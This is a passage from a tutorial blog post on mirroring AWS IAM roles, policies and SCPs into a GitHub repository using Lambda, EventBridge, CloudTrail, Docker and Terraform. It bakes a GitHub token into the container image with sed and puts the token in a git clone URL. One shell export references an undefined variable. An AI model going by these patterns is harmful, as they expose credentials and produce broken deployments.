<p>In the modern era of cloud computing, managing infrastructure has evolved beyond manual configurations to embrace GitOps, a paradigm rooted in Infrastructure as Code (IaC). In this comprehensive guide, we'll delve into managing AWS Identity and Access Management (IAM) using a GitOps approach, facilitated by tools like Terraform and Docker, as well as key AWS services. If you're new to AWS, this guide serves as an ideal hands-on introduction, covering essential AWS services like Lambda, EventBridge, CloudTrail, CloudWatch, ECR, and S3.</p>
<h3 id="heading-prerequisites"><strong>Prerequisites</strong></h3>
<ul>
<li><p>AWS account</p>
</li>
<li><p>AWS CLI</p>
</li>
<li><p>Github account</p>
</li>
<li><p>Terraform</p>
</li>
<li><p>Docker</p>
</li>
</ul>
<h3 id="heading-task">Task</h3>
<p>In this blog, we will build a GitOps-driven (IaC) approach for AWS IAM management. If anyone changes IAM Roles/Policies/SCPs (Service Control Policies) in AWS, the change is pushed to GitHub. If someone changes a policy in GitHub, the configuration is updated on AWS.</p>
<p>For this demo, the code is available here - <a target="_blank" href="https://github.com/rewanthtammana/aws-iam-gitops">aws-iam-gitops</a></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1692766917654/49ab7036-63eb-4677-bc21-21b45f19706a.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-architecture">Architecture</h3>
<p>First, we need to understand the components required to achieve our goal. This is the architectural overview of the system to be built.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1692761521415/8649040a-fd74-46b5-9ad3-16fe468db6c1.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-components">Components</h3>
<h4 id="heading-github">GitHub</h4>
<p>This is where all the information on IAM Roles, Policies &amp; SCPs will be stored. Make sure to create a Personal Access Token (PAT) with read &amp; write access to the given repository.</p>
<h4 id="heading-iam">IAM</h4>
<p>This is where all the Identity and Access Management information is stored.</p>
<h4 id="heading-cloudtrail">Cloudtrail</h4>
<p>This will log every single operation that occurs on an AWS account.</p>
<h4 id="heading-s3-bucket"><strong>S3 bucket</strong></h4>
<p>This is where all the CloudTrail logs are stored.</p>
<h4 id="heading-eventbridge">EventBridge</h4>
<p>This will make it easy to build event-driven applications. In this case, the events we are looking for are IAM changes. We can configure EventBridge to notify/react whenever an IAM change event occurs.</p>
<h4 id="heading-lambda">Lambda</h4>
<p>This will run the given code/container. We don't need to own a server to execute code. In this case, it will be triggered by the EventBridge when an IAM change occurs.</p>
<h4 id="heading-cloudwatch">Cloudwatch</h4>
<p>This is where the Lambda logs are stored.</p>
<h4 id="heading-ecr">ECR</h4>
<p>Elastic Container Registry (ECR) will be used by Lambda to fetch the container image that it has to run.</p>
<h3 id="heading-trust-boundaries">Trust Boundaries</h3>
<h4 id="heading-lambda-to-ecr"><strong>Lambda to ECR</strong></h4>
<p>Lambda has permission to pull images from ECR.</p>
<h4 id="heading-lambda-to-iam"><strong>Lambda to IAM</strong></h4>
<p>Lambda has permission to list roles &amp; policies.</p>
<h4 id="heading-lambda-to-organizations"><strong>Lambda to Organizations</strong></h4>
<p>Lambda has permissions to list SCPs.</p>
<h4 id="heading-lambda-to-github"><strong>Lambda to GitHub</strong></h4>
<p>Lambda uses GitHub tokens to interact with the GitHub API.</p>
<h4 id="heading-eventbridge-to-lambda"><strong>EventBridge to Lambda</strong></h4>
<p>EventBridge has permissions to trigger the Lambda function.</p>
<h4 id="heading-cloudtrail-to-s3"><strong>CloudTrail to S3</strong></h4>
<p>CloudTrail has permission to write logs to the S3 bucket.</p>
<h4 id="heading-eventbridge-to-cloudtrail"><strong>EventBridge to CloudTrail</strong></h4>
<p>EventBridge reads from CloudTrail to trigger events.</p>
<h3 id="heading-workflow">Workflow</h3>
<h4 id="heading-initialization"><strong>Initialization</strong></h4>
<ol>
<li><p>Terraform script sets up all AWS resources.</p>
</li>
<li><p>The lambda function clones the GitHub repo.</p>
</li>
</ol>
<h4 id="heading-event-trigger">Event Trigger</h4>
<ol>
<li><p>Any change in AWS IAM or Organizations is logged by CloudTrail.</p>
</li>
<li><p>EventBridge picks up the change and triggers the Lambda function.</p>
</li>
</ol>
<h4 id="heading-lambda-execution"><strong>Lambda Execution</strong></h4>
<ol>
<li><p>The lambda function lists all IAM roles, policies, and SCPs.</p>
</li>
<li><p>Writes this information to the local clone of the GitHub repo.</p>
</li>
</ol>
<h4 id="heading-commit-to-github">Commit to Github</h4>
<ol>
<li>The lambda function commits and pushes the changes to the GitHub repo.</li>
</ol>
<h4 id="heading-terraform-destroy"><strong>Terraform Destroy</strong></h4>
<ol>
<li>Optionally, <code>terraform destroy</code> can be used to remove all the AWS resources created by Terraform (resources created outside of it, like the ECR repository, have to be deleted separately).</li>
</ol>
<h4 id="heading-logging"><strong>Logging</strong></h4>
<ol>
<li>All Lambda function logs are stored in CloudWatch Log Groups.</li>
</ol>
<h3 id="heading-building-systems-one-click">Building systems - One click</h3>
<pre><code class="lang-bash"><span class="hljs-comment"># Change environment variables (MUST/MANDATORY)</span>
<span class="hljs-comment"># Make sure TF_VAR_GITHUB_REPO exists on your GitHub</span>
<span class="hljs-built_in">export</span> TF_VAR_GITHUB_USERNAME=rewanthtammana
<span class="hljs-built_in">export</span> TF_VAR_GITHUB_REPO=testaws
<span class="hljs-built_in">export</span> TF_VAR_GITHUB_TOKEN=

<span class="hljs-comment"># Change environment variables (Optional)</span>
<span class="hljs-built_in">export</span> TF_VAR_ECR_REPO_NAME=aws-iam-gitops

<span class="hljs-comment"># Change environment variables (Optional - the suffix is used in image name, role name, lambda function name, policy name, event bridge name, s3 bucket name &amp; cloud trail name)</span>
<span class="hljs-built_in">export</span> TF_VAR_RANDOM_SUFFIX=31
<span class="hljs-built_in">export</span> TF_VAR_RANDOM_PREFIX=aws-iam-gitops

<span class="hljs-comment"># Change environment variables - Recommended to leave them as it is but feel free to change them</span>
<span class="hljs-built_in">export</span> TF_VAR_ECR_REPO_TAG=v<span class="hljs-variable">${TF_VAR_RANDOM_SUFFIX}</span>
<span class="hljs-built_in">export</span> TF_VAR_AWS_PAGER=
<span class="hljs-built_in">export</span> TF_VAR_ACCOUNT_ID=$(aws sts get-caller-identity --query Account --output text)
<span class="hljs-built_in">export</span> TF_VAR_REGION=us-east-1
<span class="hljs-built_in">export</span> TF_VAR_ROLE_NAME=<span class="hljs-variable">${TF_VAR_RANDOM_PREFIX}</span>-lambda-role-<span class="hljs-variable">${TF_VAR_RANDOM_SUFFIX}</span>
<span class="hljs-built_in">export</span> TF_VAR_IMAGE=<span class="hljs-variable">${TF_VAR_ACCOUNT_ID}</span>.dkr.ecr.<span class="hljs-variable">${REGION}</span>.amazonaws.com/<span class="hljs-variable">${TF_VAR_ECR_REPO_NAME}</span>:<span class="hljs-variable">${TF_VAR_ECR_REPO_TAG}</span>
<span class="hljs-built_in">export</span> TF_VAR_LAMBDA_FUNCTION_NAME=<span class="hljs-variable">${TF_VAR_RANDOM_PREFIX}</span>-<span class="hljs-variable">${TF_VAR_RANDOM_SUFFIX}</span>
<span class="hljs-built_in">export</span> TF_VAR_POLICY_NAME=<span class="hljs-variable">${TF_VAR_RANDOM_PREFIX}</span>-lambda-permissions-<span class="hljs-variable">${TF_VAR_RANDOM_SUFFIX}</span>
<span class="hljs-built_in">export</span> TF_VAR_LAMBDA_TIMEOUT=120
<span class="hljs-built_in">export</span> TF_VAR_EVENTBRIDGE_NAME=<span class="hljs-variable">${TF_VAR_RANDOM_PREFIX}</span>-<span class="hljs-variable">${TF_VAR_RANDOM_SUFFIX}</span>
<span class="hljs-built_in">export</span> TF_VAR_S3_BUCKET_NAME=<span class="hljs-variable">${TF_VAR_RANDOM_PREFIX}</span>-<span class="hljs-variable">${TF_VAR_RANDOM_SUFFIX}</span>
<span class="hljs-built_in">export</span> TF_VAR_CLOUDTRAIL_NAME=<span class="hljs-variable">${TF_VAR_RANDOM_PREFIX}</span>-<span class="hljs-variable">${TF_VAR_RANDOM_SUFFIX}</span>

<span class="hljs-comment"># AWS components</span>
aws ecr create-repository --repository-name <span class="hljs-variable">${TF_VAR_ECR_REPO_NAME}</span>
aws ecr get-login-password --region <span class="hljs-variable">${TF_VAR_REGION}</span> | docker login --username AWS --password-stdin <span class="hljs-variable">${TF_VAR_ACCOUNT_ID}</span>.dkr.ecr.<span class="hljs-variable">${TF_VAR_REGION}</span>.amazonaws.com
docker build --platform linux/amd64 --build-arg GITHUB_USERNAME=<span class="hljs-variable">${TF_VAR_GITHUB_USERNAME}</span> --build-arg GITHUB_REPO=<span class="hljs-variable">${TF_VAR_GITHUB_REPO}</span> --build-arg GITHUB_TOKEN=<span class="hljs-variable">${TF_VAR_GITHUB_TOKEN}</span> -t <span class="hljs-variable">${TF_VAR_IMAGE}</span> .
docker push <span class="hljs-variable">${TF_VAR_IMAGE}</span>
terraform init
terraform apply
</code></pre>
<h3 id="heading-building-systems-tldr">Building systems - TLDR</h3>
<h4 id="heading-github-1">GitHub</h4>
<p>Make sure to create a Personal Access Token (PAT) with read &amp; write access to the given repository.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1692767366746/60e5066a-f81f-494a-8960-9a682c7b1d40.png" alt class="image--center mx-auto" /></p>
<h4 id="heading-initialize-variables">Initialize variables</h4>
<p>We will use Terraform to build the entire system except for ECR. Focus only on the variables that need to be changed; the other variables can be left as they are.</p>
<pre><code class="lang-bash"><span class="hljs-comment"># Change environment variables (MUST/MANDATORY)</span>
<span class="hljs-comment"># Make sure TF_VAR_GITHUB_REPO exists on your GitHub</span>
<span class="hljs-built_in">export</span> TF_VAR_GITHUB_TOKEN=
<span class="hljs-built_in">export</span> TF_VAR_GITHUB_USERNAME=rewanthtammana
<span class="hljs-built_in">export</span> TF_VAR_GITHUB_REPO=testaws

<span class="hljs-comment"># Change environment variables (Optional)</span>
<span class="hljs-built_in">export</span> TF_VAR_ECR_REPO_NAME=aws-iam-gitops

<span class="hljs-comment"># Change environment variables (Optional - the suffix is used in image name, role name, lambda function name, policy name, event bridge name, s3 bucket name &amp; cloud trail name)</span>
<span class="hljs-built_in">export</span> TF_VAR_RANDOM_SUFFIX=31
<span class="hljs-built_in">export</span> TF_VAR_RANDOM_PREFIX=aws-iam-gitops

<span class="hljs-comment"># Change environment variables - Recommended to leave them as it is but feel free to change them</span>
<span class="hljs-built_in">export</span> TF_VAR_ECR_REPO_TAG=v<span class="hljs-variable">${TF_VAR_RANDOM_SUFFIX}</span>
<span class="hljs-built_in">export</span> TF_VAR_AWS_PAGER=
<span class="hljs-built_in">export</span> TF_VAR_ACCOUNT_ID=$(aws sts get-caller-identity --query Account --output text)
<span class="hljs-built_in">export</span> TF_VAR_REGION=us-east-1
<span class="hljs-built_in">export</span> TF_VAR_ROLE_NAME=<span class="hljs-variable">${TF_VAR_RANDOM_PREFIX}</span>-lambda-role-<span class="hljs-variable">${TF_VAR_RANDOM_SUFFIX}</span>
<span class="hljs-built_in">export</span> TF_VAR_IMAGE=<span class="hljs-variable">${TF_VAR_ACCOUNT_ID}</span>.dkr.ecr.<span class="hljs-variable">${REGION}</span>.amazonaws.com/<span class="hljs-variable">${TF_VAR_ECR_REPO_NAME}</span>:<span class="hljs-variable">${TF_VAR_ECR_REPO_TAG}</span>
<span class="hljs-built_in">export</span> TF_VAR_LAMBDA_FUNCTION_NAME=<span class="hljs-variable">${TF_VAR_RANDOM_PREFIX}</span>-<span class="hljs-variable">${TF_VAR_RANDOM_SUFFIX}</span>
<span class="hljs-built_in">export</span> TF_VAR_POLICY_NAME=<span class="hljs-variable">${TF_VAR_RANDOM_PREFIX}</span>-lambda-permissions-<span class="hljs-variable">${TF_VAR_RANDOM_SUFFIX}</span>
<span class="hljs-built_in">export</span> TF_VAR_LAMBDA_TIMEOUT=120
<span class="hljs-built_in">export</span> TF_VAR_EVENTBRIDGE_NAME=<span class="hljs-variable">${TF_VAR_RANDOM_PREFIX}</span>-<span class="hljs-variable">${TF_VAR_RANDOM_SUFFIX}</span>
<span class="hljs-built_in">export</span> TF_VAR_S3_BUCKET_NAME=<span class="hljs-variable">${TF_VAR_RANDOM_PREFIX}</span>-<span class="hljs-variable">${TF_VAR_RANDOM_SUFFIX}</span>
<span class="hljs-built_in">export</span> TF_VAR_CLOUDTRAIL_NAME=<span class="hljs-variable">${TF_VAR_RANDOM_PREFIX}</span>-<span class="hljs-variable">${TF_VAR_RANDOM_SUFFIX}</span>
</code></pre>
<h4 id="heading-lambda-function">Lambda function</h4>
<p>Let's start by writing a Lambda function that will sync the desired IAM resources to GitHub. I will use Python here, but feel free to use any supported tech stack.</p>
<p>To summarize the below code,</p>
<ol>
<li><p>We define a <code>handler</code> function that will be used by AWS Lambda for execution.</p>
<pre><code class="lang-python"> <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">handler</span>(<span class="hljs-params">event, context</span>):</span>
     <span class="hljs-comment">#.....</span>
</code></pre>
</li>
<li><p>Import <code>boto3</code> Python SDK to fetch AWS IAM information.</p>
<pre><code class="lang-python"> <span class="hljs-comment"># AWS clients</span>
 iam = boto3.client(<span class="hljs-string">'iam'</span>)
 orgs = boto3.client(<span class="hljs-string">'organizations'</span>)
</code></pre>
</li>
<li><p>Define placeholders for all required variables. DO NOT CHANGE THEM.</p>
<pre><code class="lang-python"> <span class="hljs-comment"># GitHub credentials</span>
 github_username = <span class="hljs-string">"GITHUB_USERNAME"</span>
 github_token = <span class="hljs-string">"GITHUB_TOKEN"</span>
 github_repo_name = <span class="hljs-string">"GITHUB_REPO"</span>
</code></pre>
</li>
<li><p>Clone the destination repository where you want to push your code. There are several limitations with consuming the APIs from <a target="_blank" href="https://github.com/PyGithub/PyGithub">PyGithub</a> directly, so we will fall back to plain git commands.</p>
<pre><code class="lang-python"> random_string = str(randrange(<span class="hljs-number">100</span>, <span class="hljs-number">100000</span>))
 local_repo = <span class="hljs-string">f"/tmp/<span class="hljs-subst">{random_string}</span>"</span>

 repo_url = <span class="hljs-string">f"https://<span class="hljs-subst">{github_username}</span>:<span class="hljs-subst">{github_token}</span>@github.com/<span class="hljs-subst">{github_username}</span>/<span class="hljs-subst">{github_repo_name}</span>.git"</span>
 clone_command = <span class="hljs-string">f"git clone --depth 1 <span class="hljs-subst">{repo_url}</span> <span class="hljs-subst">{local_repo}</span>"</span>
 os.system(clone_command)
</code></pre>
</li>
<li><p>Fetch the IAM information for Roles, Policies &amp; SCPs. By default, these AWS APIs return only 100 results per call, so we have to paginate to get the complete list. Once we have them, create a file for each entry in the cloned repository.</p>
<pre><code class="lang-python"> <span class="hljs-comment"># Create new folders and populate them</span>
 <span class="hljs-keyword">for</span> client, category <span class="hljs-keyword">in</span> [(iam, <span class="hljs-string">"roles"</span>), (iam, <span class="hljs-string">"policies"</span>), (orgs, <span class="hljs-string">"scps"</span>)]:
     os.makedirs(category, exist_ok=<span class="hljs-literal">True</span>)
     items = []
     <span class="hljs-keyword">if</span> category == <span class="hljs-string">"roles"</span>:
         paginator = client.get_paginator(<span class="hljs-string">'list_roles'</span>)
         <span class="hljs-keyword">for</span> page <span class="hljs-keyword">in</span> paginator.paginate():
             items.extend(page[<span class="hljs-string">'Roles'</span>])
     <span class="hljs-keyword">elif</span> category == <span class="hljs-string">"policies"</span>:
         paginator = client.get_paginator(<span class="hljs-string">'list_policies'</span>)
         <span class="hljs-keyword">for</span> page <span class="hljs-keyword">in</span> paginator.paginate(Scope=<span class="hljs-string">'All'</span>):
             items.extend(page[<span class="hljs-string">'Policies'</span>])
     <span class="hljs-keyword">else</span>:  <span class="hljs-comment"># category == "scps"</span>
         paginator = orgs.get_paginator(<span class="hljs-string">'list_policies'</span>)
         <span class="hljs-keyword">for</span> page <span class="hljs-keyword">in</span> paginator.paginate(Filter=<span class="hljs-string">'SERVICE_CONTROL_POLICY'</span>):
             items.extend(page[<span class="hljs-string">'Policies'</span>])
         <span class="hljs-keyword">for</span> item <span class="hljs-keyword">in</span> items:
             policy_detail = orgs.describe_policy(PolicyId=item[<span class="hljs-string">'Id'</span>])
             item.update(policy_detail[<span class="hljs-string">'Policy'</span>])

     <span class="hljs-keyword">for</span> item <span class="hljs-keyword">in</span> items:
         file_name = <span class="hljs-string">f"<span class="hljs-subst">{item[<span class="hljs-string">'RoleName'</span>]}</span>.json"</span> <span class="hljs-keyword">if</span> category == <span class="hljs-string">"roles"</span> <span class="hljs-keyword">else</span> <span class="hljs-string">f"<span class="hljs-subst">{item[<span class="hljs-string">'PolicyName'</span>]}</span>.json"</span> <span class="hljs-keyword">if</span> category == <span class="hljs-string">"policies"</span> <span class="hljs-keyword">else</span> <span class="hljs-string">f"<span class="hljs-subst">{item[<span class="hljs-string">'Id'</span>]}</span>.json"</span>
         <span class="hljs-keyword">with</span> open(<span class="hljs-string">f"<span class="hljs-subst">{category}</span>/<span class="hljs-subst">{file_name}</span>"</span>, <span class="hljs-string">"w"</span>) <span class="hljs-keyword">as</span> f:
             json.dump(prettify_json(item), f, default=str, indent=<span class="hljs-number">4</span>)
</code></pre>
</li>
<li><p>After all the changes, commit &amp; push the code to GitHub (see the sketch after this list).</p>
</li>
</ol>
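<p>The push itself is plain git plumbing executed from the cloned working copy (the function wraps these commands in <code>os.system</code> calls). A rough shell equivalent, with placeholder identity values:</p>
<pre><code class="lang-bash">cd "$local_repo"
git add roles policies scps

# The committer identity below is a placeholder - use whatever you want the commits to show
git -c user.name="iam-sync-bot" -c user.email="iam-sync-bot@example.com" \
  commit -m "Sync IAM roles, policies &amp; SCPs"
git push origin HEAD
</code></pre>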
<h4 id="heading-container-imagedockerfile">Container image/Dockerfile</h4>
<p>To achieve consistency, it's always recommended to run an application from a container image. We will package the above code into a container image &amp; feed it to Lambda for execution.</p>
<ol>
<li><p>Import the base image that's supported by Lambda runtime.</p>
<pre><code class="lang-dockerfile"> <span class="hljs-keyword">FROM</span> public.ecr.aws/lambda/python:<span class="hljs-number">3.11</span>
</code></pre>
</li>
<li><p>Copy the list of packages required from <code>requirements.txt</code></p>
<pre><code class="lang-dockerfile"> <span class="hljs-keyword">COPY</span><span class="bash"> requirements.txt <span class="hljs-variable">${LAMBDA_TASK_ROOT}</span></span>
</code></pre>
</li>
<li><p>If you remember, we marked some placeholders in the above Python code. We declare them as build arguments here &amp; they get substituted into the code during the Docker build.</p>
<pre><code class="lang-dockerfile"> <span class="hljs-keyword">ARG</span> GITHUB_USERNAME
 <span class="hljs-keyword">ARG</span> GITHUB_REPO
 <span class="hljs-keyword">ARG</span> GITHUB_TOKEN

 <span class="hljs-comment"># Copy function code</span>
 <span class="hljs-keyword">COPY</span><span class="bash"> lambda_function.py <span class="hljs-variable">${LAMBDA_TASK_ROOT}</span></span>
 <span class="hljs-keyword">RUN</span><span class="bash"> sed -i <span class="hljs-string">"s/GITHUB_USERNAME/<span class="hljs-variable">$GITHUB_USERNAME</span>/g"</span> <span class="hljs-variable">${LAMBDA_TASK_ROOT}</span>/lambda_function.py</span>
 <span class="hljs-keyword">RUN</span><span class="bash"> sed -i <span class="hljs-string">"s/GITHUB_REPO/<span class="hljs-variable">$GITHUB_REPO</span>/g"</span> <span class="hljs-variable">${LAMBDA_TASK_ROOT}</span>/lambda_function.py</span>
 <span class="hljs-keyword">RUN</span><span class="bash"> sed -i <span class="hljs-string">"s/GITHUB_TOKEN/<span class="hljs-variable">$GITHUB_TOKEN</span>/g"</span> <span class="hljs-variable">${LAMBDA_TASK_ROOT}</span>/lambda_function.py</span>
</code></pre>
</li>
<li><p>Install all the required packages</p>
<pre><code class="lang-dockerfile"> <span class="hljs-comment"># Install the specified packages</span>
 <span class="hljs-keyword">RUN</span><span class="bash"> pip install -r requirements.txt</span>

 <span class="hljs-keyword">RUN</span><span class="bash"> yum update &amp;&amp; yum -y install git</span>
</code></pre>
</li>
<li><p>Reference the handler function as a starting point for the container when it starts.</p>
<pre><code class="lang-dockerfile"> <span class="hljs-comment"># Set the CMD to your handler (could also be done as a parameter override outside of the Dockerfile)</span>
 <span class="hljs-keyword">CMD</span><span class="bash"> [ <span class="hljs-string">"lambda_function.handler"</span> ]</span>
</code></pre>
</li>
</ol>
<h4 id="heading-push-image-to-elastic-container-registry-ecr">Push image to Elastic Container Registry (ECR)</h4>
<ol>
<li><p>We need to create an ECR repository.</p>
<pre><code class="lang-bash"> aws ecr create-repository --repository-name <span class="hljs-variable">${TF_VAR_ECR_REPO_NAME}</span>
</code></pre>
</li>
<li><p>Login to the ECR repository</p>
<pre><code class="lang-bash"> aws ecr get-login-password --region <span class="hljs-variable">${TF_VAR_REGION}</span> | docker login --username AWS --password-stdin <span class="hljs-variable">${TF_VAR_ACCOUNT_ID}</span>.dkr.ecr.<span class="hljs-variable">${TF_VAR_REGION}</span>.amazonaws.com
</code></pre>
</li>
<li><p>Build the container image.</p>
<pre><code class="lang-bash"> docker build --platform linux/amd64 --build-arg GITHUB_USERNAME=<span class="hljs-variable">${TF_VAR_GITHUB_USERNAME}</span> --build-arg GITHUB_REPO=<span class="hljs-variable">${TF_VAR_GITHUB_REPO}</span> --build-arg GITHUB_TOKEN=<span class="hljs-variable">${TF_VAR_GITHUB_TOKEN}</span> -t <span class="hljs-variable">${TF_VAR_IMAGE}</span> .
</code></pre>
<p> <img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1693036330459/091e9bf1-4b0b-4c0a-aefa-28aef16d33f7.png" alt class="image--center mx-auto" /></p>
</li>
<li><p>Push it to the ECR repository.</p>
<pre><code class="lang-bash"> docker push <span class="hljs-variable">${TF_VAR_IMAGE}</span>
</code></pre>
</li>
</ol>
<h3 id="heading-terraform-iam-lambda-eventbridge-cloudtrail-cloudwatch-s3">Terraform - IAM, Lambda, EventBridge, Cloudtrail, Cloudwatch, S3</h3>
<p>Terraform sets up a robust AWS infrastructure. We will have to set up the below things.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1693037019299/fe333bfd-1e65-4417-af64-43656cef356f.png" alt class="image--center mx-auto" /></p>
<h4 id="heading-provider-block">Provider Block</h4>
<p>This block specifies that we are using AWS as our cloud provider and sets the AWS region to <code>us-east-1</code>.</p>
<pre><code class="lang-json">provider <span class="hljs-string">"aws"</span> {
  region = <span class="hljs-attr">"us-east-1"</span>
}
</code></pre>
<h4 id="heading-variable-blocks">Variable Blocks</h4>
<p>Here, we define various variables that will be used throughout the script. For example, <code>GITHUB_USERNAME</code> will store the GitHub username. Similarly, we define other variables like <code>GITHUB_REPO</code>, <code>GITHUB_TOKEN</code>, <code>ECR_REPO_NAME</code>, etc. These are extracted from the environment variables we initialized before.</p>
<pre><code class="lang-json">variable <span class="hljs-string">"GITHUB_USERNAME"</span> {
  description = <span class="hljs-attr">"GitHub username"</span>
  type        = string
}

variable <span class="hljs-string">"GITHUB_REPO"</span> {
  description = <span class="hljs-attr">"GitHub repository name"</span>
  type        = string
}

variable <span class="hljs-string">"GITHUB_TOKEN"</span> {
  description = <span class="hljs-attr">"GitHub Personal Access Token"</span>
  type        = string
  sensitive   = true
}

variable <span class="hljs-string">"ECR_REPO_NAME"</span> {
  description = <span class="hljs-attr">"ECR Repository Name"</span>
  type        = string
}

variable <span class="hljs-string">"RANDOM_SUFFIX"</span> {
  description = <span class="hljs-attr">"Random Suffix for Resource Names"</span>
  type        = string
}

variable <span class="hljs-string">"ECR_REPO_TAG"</span> {
  description = <span class="hljs-attr">"ECR Repository Tag"</span>
  type        = string
}

variable <span class="hljs-string">"AWS_PAGER"</span> {
  description = <span class="hljs-attr">"AWS Pager Environment Variable"</span>
  type        = string
  default     = <span class="hljs-attr">""</span>
}

variable <span class="hljs-string">"ACCOUNT_ID"</span> {
  description = <span class="hljs-attr">"AWS Account ID"</span>
  type        = string
}

variable <span class="hljs-string">"REGION"</span> {
  description = <span class="hljs-attr">"AWS Region"</span>
  type        = string
}

variable <span class="hljs-string">"ROLE_NAME"</span> {
  description = <span class="hljs-attr">"IAM Role Name"</span>
  type        = string
}

variable <span class="hljs-string">"IMAGE"</span> {
  description = <span class="hljs-attr">"Docker Image URI"</span>
  type        = string
}

variable <span class="hljs-string">"LAMBDA_FUNCTION_NAME"</span> {
  description = <span class="hljs-attr">"Lambda Function Name"</span>
  type        = string
}

variable <span class="hljs-string">"POLICY_NAME"</span> {
  description = <span class="hljs-attr">"IAM Policy Name"</span>
  type        = string
}

variable <span class="hljs-string">"LAMBDA_TIMEOUT"</span> {
  description = <span class="hljs-attr">"Lambda Function Timeout"</span>
  type        = number
  default     = 120
}

variable <span class="hljs-string">"EVENTBRIDGE_NAME"</span> {
  description = <span class="hljs-attr">"EventBridge name"</span>
  type        = string
}

variable <span class="hljs-string">"S3_BUCKET_NAME"</span> {
  description = <span class="hljs-attr">"S3 Bucket"</span>
  type        = string
}

variable <span class="hljs-string">"CLOUDTRAIL_NAME"</span> {
  description = <span class="hljs-attr">"Cloudtrail name"</span>
  type        = string
}
</code></pre>
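<p>The link between the earlier shell exports and these variable blocks is Terraform's naming convention: any environment variable named <code>TF_VAR_&lt;name&gt;</code> is automatically picked up as the value of <code>var.&lt;name&gt;</code>. For example:</p>
<pre><code class="lang-bash"># No -var flags or tfvars file needed; Terraform reads these from the environment
export TF_VAR_GITHUB_USERNAME=rewanthtammana   # becomes var.GITHUB_USERNAME
export TF_VAR_REGION=us-east-1                 # becomes var.REGION
terraform plan
</code></pre>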
<h4 id="heading-local-values">Local Values</h4>
<p>Local values are convenient names or computations that are used multiple times within a module. Here, we define a local value <code>account_id</code> to store the AWS account ID, which is fetched from <code>data.aws_caller_identity.current.account_id</code>, along with a few others.</p>
<pre><code class="lang-json">locals {
  account_id = data.aws_caller_identity.current.account_id
  region     = var.REGION
  ecr_repo_name = var.ECR_REPO_NAME
  ecr_repo_tag = var.ECR_REPO_TAG
  github_username = var.GITHUB_USERNAME
  github_repo = var.GITHUB_REPO
  github_token = var.GITHUB_TOKEN
  role_name = var.ROLE_NAME
  lambda_function_name = var.LAMBDA_FUNCTION_NAME
  policy_name = var.POLICY_NAME
  lambda_timeout = var.LAMBDA_TIMEOUT
  eventbridge_name = var.EVENTBRIDGE_NAME
  s3_bucket_name = var.S3_BUCKET_NAME
  cloudtrail_name = var.CLOUDTRAIL_NAME
}
</code></pre>
<h4 id="heading-data-blocks">Data Blocks</h4>
<p>This data block fetches the current AWS account ID, user ID, and ARN, which can be used in other resources.</p>
<pre><code class="lang-json">data <span class="hljs-string">"aws_caller_identity"</span> <span class="hljs-string">"current"</span> {}
</code></pre>
<h4 id="heading-iam-role-for-lambda">IAM Role for Lambda</h4>
<p>This block creates an AWS IAM role that can be used by our Lambda function.</p>
<pre><code class="lang-json">resource <span class="hljs-string">"aws_iam_role"</span> <span class="hljs-string">"lambda_role"</span> {
  name = local.role_name

  assume_role_policy = jsonencode({
    Version = <span class="hljs-attr">"2012-10-17"</span>,
    Statement = [
      {
        Action = <span class="hljs-attr">"sts:AssumeRole"</span>,
        Effect = <span class="hljs-attr">"Allow"</span>,
        Principal = {
          Service = <span class="hljs-attr">"lambda.amazonaws.com"</span>
        }
      }
    ]
  })
}
</code></pre>
<h4 id="heading-iam-policy-for-lambda">IAM Policy for Lambda</h4>
<p>We define an IAM policy that allows the Lambda function to perform desired operations like creating CloudWatch Logs, listing IAM &amp; organization policies, describing organization policies, etc.</p>
<pre><code class="lang-json">resource <span class="hljs-string">"aws_iam_policy"</span> <span class="hljs-string">"lambda_policy"</span> {
  name        = local.policy_name
  description = <span class="hljs-attr">"Policy for Lambda function"</span>

  policy = jsonencode({
    Version = <span class="hljs-attr">"2012-10-17"</span>,
    Statement = [
      {
        Effect = <span class="hljs-attr">"Allow"</span>,
        Action = [
          <span class="hljs-attr">"logs:CreateLogGroup"</span>,
          <span class="hljs-attr">"logs:CreateLogStream"</span>,
          <span class="hljs-attr">"logs:PutLogEvents"</span>
        ],
        Resource = <span class="hljs-attr">"arn:aws:logs:${local.region}:${local.account_id}:log-group:/aws/lambda/${local.lambda_function_name}:*"</span>
      },
      {
        Effect = <span class="hljs-attr">"Allow"</span>,
        Action = [
          <span class="hljs-attr">"iam:ListPolicies"</span>,
          <span class="hljs-attr">"iam:ListRoles"</span>,
          <span class="hljs-attr">"organizations:ListPolicies"</span>,
          <span class="hljs-attr">"organizations:DescribePolicy"</span>
        ],
        Resource = <span class="hljs-attr">"*"</span>
      },
      {
        Effect = <span class="hljs-attr">"Allow"</span>,
        Action = <span class="hljs-attr">"kms:Decrypt"</span>,
        Resource = <span class="hljs-attr">"arn:aws:kms:${local.region}:${local.account_id}:key/*"</span>
      }
    ]
  })
}
</code></pre>
<h4 id="heading-attach-policy-to-role">Attach Policy to Role</h4>
<p>This block attaches the IAM policy to the IAM role that will be used by the Lambda function.</p>
<pre><code class="lang-json">resource <span class="hljs-string">"aws_iam_role_policy_attachment"</span> <span class="hljs-string">"lambda_policy_attach"</span> {
  role       = aws_iam_role.lambda_role.name
  policy_arn = aws_iam_policy.lambda_policy.arn
}
</code></pre>
<h4 id="heading-lambda-function-1">Lambda Function</h4>
<p>This block defines the Lambda function, specifying its name, role, and other configurations.</p>
<pre><code class="lang-json">resource <span class="hljs-string">"aws_lambda_function"</span> <span class="hljs-string">"lambda_function"</span> {
  function_name = local.lambda_function_name
  role          = aws_iam_role.lambda_role.arn
  package_type  = <span class="hljs-attr">"Image"</span>
  image_uri     = <span class="hljs-attr">"${local.account_id}.dkr.ecr.${local.region}.amazonaws.com/${local.ecr_repo_name}:${local.ecr_repo_tag}"</span>
  architectures = [<span class="hljs-attr">"x86_64"</span>]
  timeout       = local.lambda_timeout
}
</code></pre>
<h4 id="heading-cloudwatch-log-group">CloudWatch Log Group</h4>
<p>This block creates a CloudWatch Log Group where the Lambda function's logs will be stored. We set a retention period of 7 days but it's customizable.</p>
<pre><code class="lang-json">resource <span class="hljs-string">"aws_cloudwatch_log_group"</span> <span class="hljs-string">"lambda_log_group"</span> {
